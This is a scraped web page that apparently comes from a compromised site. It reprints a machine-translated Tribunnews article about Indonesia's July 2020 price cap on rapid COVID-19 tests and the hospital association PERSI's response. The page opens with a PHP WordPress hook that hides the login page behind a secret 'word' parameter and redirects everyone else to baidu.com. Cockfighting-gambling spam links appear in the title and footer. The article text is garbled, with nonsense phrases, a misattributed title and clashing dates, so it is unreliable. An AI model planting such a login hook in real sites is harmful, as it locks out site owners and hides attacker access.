//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Asosiasi rumah sakit mendukung batas harga maksimum untuk pengujian cepat, berharap kebijakan lain | adu ayam bali_s128.net login_s128.live

Asosiasi rumah sakit mendukung batas harga maksimum untuk pengujian cepat, berharap kebijakan lain

Pelaporan dari reporter Tribunnews.com Apfia Tioconny Billy

Jakarta, TRIBUNNEWS.COM-Kementerian Kesehatan telah mengeluarkan peraturan baru tentang manajemen covid-19, menetapkan batas maksimum untuk tingkat maksimum deteksi cepat atau deteksi cepat untuk listrik Virus corona (COVID-19).

Menurut Surat Edaran No. HK.02.02 / I / 2875/2020 yang ditandatangani oleh Direktur Jenderal Pelayanan Kesehatan Kementerian Kesehatan Bambang Wibowo pada 6 Juli 2020, 19 negara tersebut menyatakan Harga tertinggi untuk standar pengujian. Rp 150.000 .

Jadi apa tanggapan rumah sakit terhadap batas kecepatan deteksi cepat?

Semua anggota Asosiasi Hubungan Masyarakat Rumah Sakit Indonesia (PERSI), Anjari Umarjiyanto, mengungkapkan bahwa PERSI siap mendukung setiap kebijakan pemerintah yang bertujuan mencegah penyebaran Covid-19, termasuk aturan yang membatasi tingkat deteksi cepat. Mendukung tujuan kebijakan membatasi tingkat maksimum pengujian antibodi cepat untuk mempertahankan kualitas dan harga terjangkau. “Anjari mengatakan kepada Tribunnews.com, Jumat (6/10/2020). Selama uji cepat, PERSI juga meminta agar batas harga uji cepat diterapkan, dan setelah itu, ketersediaan kami harus dijamin. Alasannya adalah ketersediaan dan aksesibilitas es. Itu memang memengaruhi biaya inspeksi-diri yang harus dibayar oleh masyarakat untuk penentuan biaya cepat rumah sakit.

“PERSI sangat berharap bahwa kebijakan pembatasan tarif akan ditingkatkan, dan standar pengujian antibodi cepat yang lebih tinggi akan mengikuti kebijakan lain, yang khususnya Mendukung ketersediaan dan keterjangkauan pengujian cepat di rumah tangga dan masyarakat, “kata Anjari. – Sebelumnya, Menteri Kesehatan Bambang Wibowo dari Kementerian Kesehatan menyebutkan bahwa batas laju tes cepat ini harus diterapkan untuk memberikan harga yang wajar bagi masyarakat.

” Ini adalah pemerintah Menanggapi penyelesaian masalah masyarakat agar memiliki harga yang adil, “kata Bambang saat tinggal bersama Departemen Koordinasi Menteri PMK, Kamis (9/7/2020). -Atau harus dilakukan oleh staf medis yang bertanggung jawab atas layanan kesehatan Tes antibodi cepat

Tes cepat adalah skrining pendahuluan untuk evaluasi covid-19. Metode ini mengambil darah dari ujung jari dan memeriksanya melalui tes cepat. Hasilnya dapat dirilis dalam beberapa menit.

Leave a comment

adu ayam bali_s128.net login_s128.live